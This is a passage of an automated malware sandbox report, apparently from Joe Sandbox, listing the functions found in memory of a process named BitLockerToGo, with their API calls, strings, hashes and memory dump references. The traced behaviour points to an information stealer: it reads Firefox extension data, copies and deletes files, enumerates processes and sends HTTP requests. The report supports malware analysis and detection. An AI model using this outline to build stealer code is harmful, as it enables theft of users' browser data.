                                                                                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,02A0EAFD), ref: 02A0963B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrlen.KERNEL32(?,?,02A19098,02A377FE,02A37787,?,?,?,?,02A19D6E), ref: 02A121AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrcpy.KERNEL32(00000000,00000000), ref: 02A121DD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(?,02A38334,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,02A37846,?,?,?,?,?,?,?,?,02A0EAFD), ref: 02A09690
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,02A0EAFD), ref: 02A096A4
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 02A0962F, 02A09634, 02A0964E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                                                                                                          • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2929475105-4027016359
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 443bc80152ce1e12c4a506a50adbd3e9c36439bfe9db188956cc8047d1032edf
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1eec35ed308c9815eb33c70e8a872cca8a27cccb245e86d9837d3946444d23ed
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 443bc80152ce1e12c4a506a50adbd3e9c36439bfe9db188956cc8047d1032edf
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE313239D80115DFEB11AF29FD8569FB7F2AB447407080B25E94863150EFB26AA6CF81
                                                                                                                                                                                                                                                                                                                                                          Function 02A18B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 02A18B1C
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,0000001C), ref: 02A18B27
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18BAB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: ERROR
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 591506033-2861137601
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4dd1c75771b02474c8e5b02f3cb94f7a1ff2f8f5bc18b87ec0ce148bda185d70
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4d8b79047e74f60d1b29156fa5fb9b7d7281c1feb1b6670843af8f4022c4e955
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dd1c75771b02474c8e5b02f3cb94f7a1ff2f8f5bc18b87ec0ce148bda185d70
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53114C71D4050AAFDB40EB74EA4669DBBB2BF04320B440621EE14A3150DF35EA69CFC1
                                                                                                                                                                                                                                                                                                                                                          Function 02A0C27B Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0C320
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0C472
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0C48D
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0C4DF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 211194620-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4d64d7572ca85f65fa171a8a5e84e8c60f220ae60f597aa45ebfa55c5058cb10
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1e591324c643d12945e438e8dd661fd30c0999e2b15d979714be8d3d9579622f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d64d7572ca85f65fa171a8a5e84e8c60f220ae60f597aa45ebfa55c5058cb10
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C711A32D801199BDF01FBB5EE85ADEB7B6BF04350B100521ED44B71A0DF62AE568F91
                                                                                                                                                                                                                                                                                                                                                          Function 02A0E401 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A18680,?), ref: 02A13A93
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,?,02A38700,02A3796B), ref: 02A0E492
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0E4A5
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                                                                                                                                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 161838763-3310892237
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 29bfab310a581fbe078817fabb96ae88fa6a58b0a26b228643f5591cc4285fe7
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9587202725a55bf8d2f059a65ceba726be00edf99e7694a88004aef78c47a757
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29bfab310a581fbe078817fabb96ae88fa6a58b0a26b228643f5591cc4285fe7
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7741D832D80129ABCF10FBB5EE86ACDB7B6AF08350B510520ED44B7194DF25AE598FD1
                                                                                                                                                                                                                                                                                                                                                          Function 02A13101 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,02A37817,?,?), ref: 02A13130
                                                                                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 02A13140
                                                                                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 02A1319E
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A131A9
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 907984538-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 67fedecc8e4b1e4a0913115a252a766b5c61f5ee8e176bfc6e1e5ad26a87adf5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b1fec1278e0b9e131e009e49df4c31a57daf97216f92add214a1ef446ce3e0c6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67fedecc8e4b1e4a0913115a252a766b5c61f5ee8e176bfc6e1e5ad26a87adf5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7117075A80228ABEB11AF64AD85BEEB7AAAF04720F000595BD05A7240DF34DF44CF91
                                                                                                                                                                                                                                                                                                                                                          Function 02A10D50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 02A10D57
                                                                                                                                                                                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 02A10D7D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A30478: std::exception::exception.LIBCMT ref: 02A3048D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A30478: __CxxThrowException@8.LIBCMT ref: 02A304A2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A30478: std::exception::exception.LIBCMT ref: 02A304B3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10927: malloc.MSVCRT ref: 02A10936
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10927: __CxxThrowException@8.LIBCMT ref: 02A10951
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Exception@8Throwstd::exception::exception$H_prolog3_catchXinvalid_argumentmallocstd::_
                                                                                                                                                                                                                                                                                                                                                          • String ID: vector<T> too long
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 285619538-3788999226
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d2431c5157309beeaf12539bdeec12ad5f246c8ca9b73c38986b6c1d63801e74
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 638bd0d368430994755790976449d3cceffce9b86b4584dfb1e8a79d2df3223e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2431c5157309beeaf12539bdeec12ad5f246c8ca9b73c38986b6c1d63801e74
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0319F71A4060A9FDB15DF68CA40AAEBBF2FF94320B14852DE959E7250EF30A941CF50
                                                                                                                                                                                                                                                                                                                                                          Function 02A1858D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A068F1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: StrCmpCA.SHLWAPI(?), ref: 02A0690B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A0693A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06979
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A069A9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A0688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A069B4
